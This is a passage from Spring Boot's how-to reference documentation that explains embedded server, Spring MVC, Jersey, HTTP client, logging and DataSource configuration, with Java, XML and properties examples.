Boot does not support \"Version 0\" of the Cookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values compliant with later Cookie specifications.\nIf, however, you cannot change the way that cookies are written, you can instead configure Tomcat to use a `LegacyCookieProcessor`.\nTo switch to the `LegacyCookieProcessor`, use an `WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-tomcat-mbean-registry]]\n=== Enable Tomcat's MBean Registry\nEmbedded Tomcat's MBean registry is disabled by default.\nThis minimizes Tomcat's memory footprint.\nIf you want to use Tomcat's MBeans, for example so that they can be used to expose metrics via Micrometer, you must use the configprop:server.tomcat.mbeanregistry.enabled[] property to do so, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\nserver.tomcat.mbeanregistry.enabled=true\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and add a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that used an embedded container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans with the underlying WebSocket container.\nWhen deployed to a standalone servlet container, this role is performed by a servlet container initializer, and the `ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\nSpring Boot has a number of starters that include Spring MVC.\nNote that some starters include a dependency on Spring MVC rather than include it directly.\nThis section answers common questions about Spring MVC and Spring Boot.\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON response by default as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy object), then `http:\/\/localhost:8080\/thing` serves a JSON representation of it by default.\nNote that, in a browser, you might sometimes see XML responses, because browsers tend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you can use it to render XML responses.\nThe previous example that we used for JSON would work.\nTo use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered with the additional requirement of having `MyThing` annotated as `@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8.\nIf you're using a more recent Java generation, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an `Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content conversion in an HTTP exchange.\nIf Jackson is on the classpath, you already get the default converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which is auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by default) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to configure various aspects of its processing.\nThese features are described in six enums (in Jackson) that map onto properties in the environment:\n\n|===\n| Enum | Property | Values\n\n| `com.fasterxml.jackson.databind.DeserializationFeature`\n| `spring.jackson.deserialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonGenerator.Feature`\n| `spring.jackson.generator.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.MapperFeature`\n| `spring.jackson.mapper.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.core.JsonParser.Feature`\n| `spring.jackson.parser.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.databind.SerializationFeature`\n| `spring.jackson.serialization.<feature_name>`\n| `true`, `false`\n\n| `com.fasterxml.jackson.annotation.JsonInclude.Include`\n| configprop:spring.jackson.default-property-inclusion[]\n| `always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<spring-boot-features.adoc#boot-features-external-config-relaxed-binding, relaxed binding>>, the case of `indent_output` does not have to match the case of the corresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured `Jackson2ObjectMapperBuilder` bean and applies to any mappers created by using the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more `Jackson2ObjectMapperBuilderCustomizer` beans.\nSuch customizer beans can be ordered (Boot's own customizer has an order of 0), letting additional customization be applied both before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered with the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper` instances that it creates.\nThis provides a global mechanism for contributing custom modules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of that type and mark it as `@Primary` or, if you prefer the builder-based approach, define a `Jackson2ObjectMapperBuilder` `@Bean`.\nNote that, in either case, doing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`, they replace the default value in the MVC configuration.\nAlso, a convenience bean of type `HttpMessageConverters` is provided (and is always available if you use the default MVC configuration).\nIt has some useful methods to access the default and user-enhanced message converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from `@RestController`).\nYou can contribute additional converters by adding beans of the appropriate type in a Spring Boot context.\nIf a bean you add is of a type that would have been included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON conversions), it replaces the default value.\nA convenience bean of type `HttpMessageConverters` is provided and is always available if you use the default MVC configuration.\nIt has some useful methods to access the default and user-enhanced message converters (For example, it can be useful if you want to manually inject them into a custom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also contribute converters by overriding the `configureMessageConverters` method.\nHowever, unlike with normal MVC, you can supply only additional converters that you need (because Spring Boot uses the same mechanism to contribute its defaults).\nFinally, if you opt out of the Spring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration, you can take control completely and do everything manually by using `getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`] source code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading files.\nBy default, Spring Boot configures Spring MVC with a maximum size of 1MB per file and a maximum of 10MB of file data in a single request.\nYou may override these values, the location to which intermediate data is stored (for example, to the `\/tmp` directory), and the threshold past which data is flushed to disk by using the properties exposed in the `MultipartProperties` class.\nFor example, if you want to specify that files be unlimited, set the configprop:spring.servlet.multipart.max-file-size[] property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as a `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller handler method.\n\nSee the {spring-boot-autoconfigure-module-code}\/web\/servlet\/MultipartAutoConfiguration.java[`MultipartAutoConfiguration`] source for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads rather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`).\nIf you would rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\",configprops]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or `ServletRegistrationBean` for each and Spring Boot will register them transparently to the container.\nBecause servlets are registered that way, they can be mapped to a sub-context of the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a `@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of your custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own `@Configuration` with the `@EnableWebMvc` annotation.\nDoing so leaves all MVC configuration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in `@Controller` to actual `View` implementations.\nNote that `ViewResolvers` are mainly used in UI applications, rather than REST-style services (a `View` is not used to render a `@ResponseBody`).\nThere are many implementations of `ViewResolver` to choose from, and Spring on its own is not opinionated about which ones you should use.\nSpring Boot, on the other hand, installs one or two for you, depending on what it finds on the classpath and in the application context.\nThe `DispatcherServlet` uses all the resolvers it finds in the application context, trying each one in turn until it gets a result.\nIf you add your own, you have to be aware of the order and in which position your resolver is added.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'.\n This one locates physical resources that can be rendered by using the `DefaultServlet` (including static resources and JSP pages, if you use those).\n It applies a prefix and a suffix to the view name and then looks for a physical resource with that path in the servlet context (the defaults are both empty but are accessible for external configuration through `spring.mvc.view.prefix` and `spring.mvc.view.suffix`).\n You can override it by providing a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'.\n This is a useful member of the view resolver chain and picks up any beans with the same name as the `View` being resolved.\n It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are* actually beans of type `View` present.\n This is a '`master`' resolver, delegating to all the others and attempting to find a match to the '`Accept`' HTTP header sent by the client.\n There is a useful https:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about `ContentNegotiatingViewResolver`] that you might like to study to learn more, and you might also look at the source code for detail.\n You can switch off the auto-configured `ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named '`thymeleafViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.thymeleaf.prefix`, and the suffix is `spring.thymeleaf.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.html`', respectively.\n You can override `ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named '`freeMarkerViewResolver`'.\n It looks for resources in a loader path (which is externalized to `spring.freemarker.templateLoaderPath` and has a default value of '`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix.\n The prefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to `spring.freemarker.suffix`.\n The default values of the prefix and suffix are empty and '`.ftlh`', respectively.\n You can override `FreeMarkerViewResolver` by providing a bean of the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you also have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'.\n It looks for resources in a loader path by surrounding the view name with a prefix and suffix (externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\n The prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`', respectively.\n You can override `GroovyMarkupViewResolver` by providing a bean of the same name.\n* If you use Mustache, you also have a `MustacheViewResolver` named '`mustacheViewResolver`'.\n It looks for resources by surrounding the view name with a prefix and suffix.\n The prefix is `spring.mustache.prefix`, and the suffix is `spring.mustache.suffix`.\n The values of the prefix and suffix default to '`classpath:\/templates\/`' and '`.mustache`', respectively.\n You can override `MustacheViewResolver` by providing a bean of the same name.\n\nFor more detail, see the following sections:\n\n* {spring-boot-autoconfigure-module-code}\/web\/servlet\/WebMvcAutoConfiguration.java[`WebMvcAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`]\n* {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user that has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test and this can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's {spring-security-docs}#test[reference documentation]).\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same way as it can be used to secure a Spring MVC-based web application.\nHowever, if you want to use Spring Security's method-level security with Jersey, you must configure Jersey to use `setStatus(int)` rather `sendError(int)`.\nThis prevents Jersey from committing the response before Spring Security has had an opportunity to report an authentication or authorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true` on the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-jersey-alongside-another-web-framework]]\n=== Use Jersey Alongside Another Web Framework\nTo use Jersey alongside another web framework, such as Spring MVC, it should be configured so that it will allow the other framework to handle requests that it cannot handle.\nFirst, configure Jersey to use a Filter rather than a Servlet by configuring the configprop:spring.jersey.type[] application property with a value of `filter`.\nSecond, configure your `ResourceConfig` to forward requests that would have resulted in a 404, as shown in the following example.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t\tproperty(ServletProperties.FILTER_FORWARD_ON_404, true);\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\nSpring Boot offers a number of starters that work with HTTP clients.\nThis section answers questions related to using them.\n\n\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>, you can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized `RestTemplate`.\nThis is the recommended approach for creating a `RestTemplate` configured to use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request factory that is being used.\nThe following example configures `HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts except `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n[[howto-webclient-reactor-netty-customization]]\n=== Configure the TcpClient used by a Reactor Netty-based WebClient\nWhen Reactor Netty is on the classpath a Reactor Netty-based `WebClient` is auto-configured.\nTo customize the client's handling of network connections, provide a `ClientHttpConnector` bean.\nThe following example configures a 60 second connect timeout and adds a `ReadTimeoutHandler`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/reactive\/function\/client\/ReactorNettyClientCustomizationExample.java[tag=custom-http-connector]\n----\n\nTIP: Note the use of `ReactorResourceFactory` for the connection provider and event loop resources.\nThis ensures efficient sharing of resources for the server receiving requests and the client making requests.\n\n\n[[howto-logging]]\n== Logging\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which is typically provided by Spring Framework's `spring-jcl` module.\nTo use https:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on `spring-boot-starter-logging`.\nFor a web application, you need only `spring-boot-starter-web`, since it depends transitively on the logging starter.\nIf you use Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on the content of the classpath.\nIf Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers, you can do so in `application.properties` by using the \"logging.level\" prefix, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the console) by using \"logging.file.name\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native configuration format supported by the `LoggingSystem` in question.\nBy default, Spring Boot picks up the native configuration from its default location for the system (such as `classpath:logback.xml` for Logback), but you can set the location of the config file by using the configprop:logging.config[] property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you need to apply customizations to logback beyond those that can be achieved with `application.properties`, you'll need to add a standard logback configuration file.\nYou can add a `logback.xml` file to the root of your classpath for logback to find.\nYou can also use `logback-spring.xml` if you want to use the <<spring-boot-features.adoc#boot-features-logback-extensions,Spring Boot Logback extensions>>.\n\nTIP: The Logback documentation has a https:\/\/logback.qos.ch\/manual\/configuration.html[dedicated section that covers configuration] in some detail.\n\nSpring Boot provides a number of logback configurations that be `included` from your own configuration.\nThese includes are designed to allow certain common Spring Boot conventions to be re-applied.\n\nThe following files are provided under `org\/springframework\/boot\/logging\/logback\/`:\n\n* `defaults.xml` - Provides conversion rules, pattern properties and common logger configurations.\n* `console-appender.xml` - Adds a `ConsoleAppender` using the `CONSOLE_LOG_PATTERN`.\n* `file-appender.xml` - Adds a `RollingFileAppender` using the `FILE_LOG_PATTERN` and `ROLLING_FILE_NAME_PATTERN` with appropriate settings.\n\nIn addition, a legacy `base.xml` file is provided for compatibility with earlier versions of Spring Boot.\n\nA typical custom `logback.xml` file would look something like this:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/console-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"CONSOLE\" \/>\n\t\t<\/root>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nYour logback configuration file can also make use of System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: Whether `logging.file.name` was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: Whether `logging.file.path` (representing a directory for log files to live in) was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set in Boot's external configuration.\n* `$\\{ROLLING_FILE_NAME_PATTERN}`: Whether `logging.pattern.rolling-file-name` was set in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in a log file) by using a custom Logback converter.\nSee the `CONSOLE_LOG_PATTERN` in the `defaults.xml` configuration for an example.\n\nIf Groovy is on the classpath, you should be able to configure Logback with `logback.groovy` as well.\nIf present, this setting is given preference.\n\nNOTE: Spring extensions are not supported with Groovy configuration.\nAny `logback-spring.groovy` files will not be detected.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom `logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file.name` to your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.file.name=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports https:\/\/logging.apache.org\/log4j\/2.x\/[Log4j 2] for logging configuration if it is on the classpath.\nIf you use the starters for assembling dependencies, you have to exclude Logback and then include log4j 2 instead.\nIf you do not use the starters, you need to provide (at least) `spring-jcl` in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some jiggling with excludes.\nThe following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation 'org.springframework.boot:spring-boot-starter-web'\n\t\timplementation 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging requirements (such as having Tomcat use `java.util.logging` but configuring the output using Log4j 2).\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into Log4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK logging adapter] by setting the `java.util.logging.manager` system property to `org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON configuration files.\nTo configure Log4j 2 to use an alternative configuration file format, add the appropriate dependencies to the classpath and name your configuration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75a,15a\"]\n|===\n| Format | Dependencies | File names\n\n|YAML\n| `com.fasterxml.jackson.core:jackson-databind` + `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\n| `log4j2.yaml` + `log4j2.yml`\n\n|JSON\n| `com.fasterxml.jackson.core:jackson-databind`\n| `log4j2.json` + `log4j2.jsn`\n|===\n\n\n\n[[howto-data-access]]\n== Data Access\nSpring Boot includes a number of starters for working with data sources.\nThis section answers questions related to doing so.\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database initialization.\nIf you need to externalize some settings, you can bind your `DataSource` to the environment (see \"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the username, and the pool size, these settings are bound automatically before the `DataSource` is made available to other components.\nThe regular <<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens (so the relevant sub-set of `spring.datasource.*` can still be used with your custom configuration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can be used to create one of the standard data sources (if it is on the classpath).\nThe builder can detect the one to use based on what's available on the classpath.\nIt also auto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection information.\nPool-specific settings can also be provided.\nCheck the implementation that is going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch.\nBecause the actual type of the connection pool is not exposed, no keys are generated in the metadata for your custom `DataSource` and no completion is available in your IDE (because the `DataSource` interface exposes no properties).\nAlso, if you happen to have Hikari on the classpath, this basic setup does not work, because Hikari has no `url` property (but does have a `jdbcUrl` property).\nIn that case, you must rewrite your configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated implementation rather than `DataSource`.\nYou cannot change the implementation at runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is, by providing a default embedded database with a sensible username and password if no URL is provided.\nYou can easily initialize a `DataSourceBuilder` from the state of any `DataSourceProperties` object, so you could also inject the DataSource that Spring Boot creates automatically.\nHowever, that would split your configuration into two namespaces: `url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on your custom namespace (`app.datasource`).\nTo avoid that, you can redefine a custom `DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that a dedicated connection pool is chosen (in code) and its settings are exposed in the `app.datasource.configuration` sub namespace.\nBecause `DataSourceProperties` is taking care of the `url`\/`jdbcUrl` translation for you, you can configure it as 